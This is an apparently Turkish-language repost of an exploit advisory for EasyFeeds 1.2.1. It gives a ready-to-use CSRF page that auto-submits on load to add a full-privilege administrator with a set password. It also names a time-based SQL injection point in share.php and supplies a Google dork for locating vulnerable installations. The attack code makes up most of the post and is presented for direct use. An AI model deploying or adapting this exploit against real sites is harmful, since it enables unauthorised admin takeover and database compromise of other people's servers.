EasyFeeds CSRF SQLi Vulnerabilities

Aşağıdaki html code ile EasyFeeds /manager/actions_admins.php?pmode=edit şifre değiştirilerek edit yapmak mümkün, ayrıca /share.php?content=[time based injection] sql injection açığından faydalınalabiliyor.
Açık hakkında açıklamalar ve code.

##########################################
# Exploit Title: EasyFeeds CSRF/SQLi Vulnerabilities
# Date: 2012-10-2
# Author: DaOne
# Home: 1337day Inj3ct0r Exploit Database
# Software Link: http://www.ktools.net/easyfeeds/
# Price: $59
# Version: 1.2.1
# Category: webapps/php
# Google dork: intext:"Powered By: EasyFeeds-1.2.1"
##########################################

[#] CSRF Add Admin:

<html>
<body onload="document.form.submit();">
<form method="POST" name="form" action="http://[target]/manager/actions_admins.php?pmode=edit">
<input type="hidden" name="return" value="main.php?page=1">
<input type="hidden" name="id" value="new">
<input type="hidden" name="name" value="DaOne">
<input type="hidden" name="pass" value="pass123">
<input type="hidden" name="email" value="admin@email.com">
<input type="hidden" name="level4" value="4">
<input type="hidden" name="level1" value="1">
<input type="hidden" name="level2" value="2">
<input type="hidden" name="level3" value="3">
<input type="hidden" name="level5" value="5">
<input type="hidden" name="level6" value="6">
<input type="hidden" name="count" value="6">
<input type="hidden" name="active" value="1">
</form>
</body>
</html>


[#] SQL Injection:

# Exploit
http://<host>/share.php?content=[time based injection]

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir